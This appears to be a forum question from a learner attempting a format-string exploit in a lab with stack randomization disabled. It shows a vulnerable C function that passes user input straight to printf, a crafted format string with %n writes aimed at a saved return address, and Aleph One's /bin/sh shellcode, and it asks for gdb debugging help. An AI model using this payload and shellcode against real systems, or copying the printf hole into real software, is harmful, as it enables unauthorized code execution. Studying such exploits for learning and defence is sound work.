I'm running this in an environment with stack randomization disabled, and using the gcc version compatible with AlephOne's buffer overflow - that works great!
I'm trying to overwrite the instruction pointer register (eip) with the address of the array containing my shellcode. I always end up with segmentation fault though. The following is a snippet I'm trying to exploit:
//Prints version
static
void print_version(char* cmd)
{
char txt[640+1];
snprintf(txt, 640, "Submission program version 0.1 (%s)\n", cmd);
printf(txt);
}
I'm calling this function through execve(). The format string is the argv[0] here, which is successfully passed to the function above.
I'm having this format string:
\x0c\xdc\xbf\xffjunk\x0d\xdc\xbf\xffjunk\x0e\xdc\xbf\xffjunk\x0f\xdc\xbf\xff%8x%8x%120x%n%5x%n%230x%n%64x%n
followed by 200 NOPs, shellcode and remaining array with the NOPs as well.
The shellcode is Aleph One's code:
static char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";
Going back to the format string, I'm overwriting 4 addresses 0xffbfdc0c to 0xffbfdc0f. 0xffbfdc0c is the saved eip address I found by setting a break point on print_version() function mentioned at the top.
I'm trying to replace it with the address 0xffbfdcd4, which is 150 bytes above the base address for txt[] array in print_version (counting the initial characters of the txt[] in the function and format string after that, hoping it may land somewhere in the NOPs preceding the shellcode).
I just end up with a SEG fault. I'm not sure how to proceed further or how I should debug to see if it's actually overwriting the value at the intended address.
EDIT: Am I using the correct format string?
Could anyone also tell me how to check the address using gdb after my program has generated a segment fault or right before a seg fault but after change of address?
Thanks.
